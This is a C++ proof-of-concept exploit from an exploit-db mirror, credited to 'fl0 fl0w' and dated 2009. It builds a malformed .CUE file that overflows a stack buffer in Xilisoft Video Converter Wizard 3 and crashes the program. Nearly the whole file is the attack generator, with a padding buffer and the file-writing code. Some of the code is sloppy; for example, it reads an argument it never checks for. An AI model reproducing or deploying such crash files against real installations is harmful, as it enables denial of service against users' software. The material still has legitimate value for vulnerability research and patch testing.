exploit-db-mirror/exploits/windows/dos/8390.cpp

/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."

class EXPLOIT {
	public:

int check (char *, char *);
void Usage (char *);
 };

static int  Poz = 1;
static int  Neg = 0;

int i;

char Name [SIZE];
char NeWbuff [SIZE];


                                                  int main (int argc, char *argv [])

 {

        EXPLOIT VIDEO;


             if ( argc < 2)

                VIDEO.Usage ( argv [0]);

                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) {

                                                       fprintf ( stdout , " Incorect input ");

                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);

                                                               exit ( 0);

                                                            }




          do {

            NeWbuff [i] = 'A';

            i++;

            }while (i < 500);



        FILE *f;

        strcpy (Name, argv [2]);

        strcat (Name, " .cue ");

        f = fopen (Name, "w");

        assert ( f != NULL);




        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF));



        fputs("FILE \"", f);

        fprintf ( f, " %s ", NeWbuff);


        fprintf ( stdout , "File build ! ");

        exit ( 0);

       getchar ();

                                                   return 0;
                                                  }




                                                  int EXPLOIT::check (char *Arg_, char *_Arg)

   {

       if ( strcmp ( Arg_, _Arg) == 0)

        return Poz;

      return Neg;

        }

    void EXPLOIT::Usage (char *Name)

   {
     system ("cls");
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");


         }


//EOF

// milw0rm.com [2009-04-10]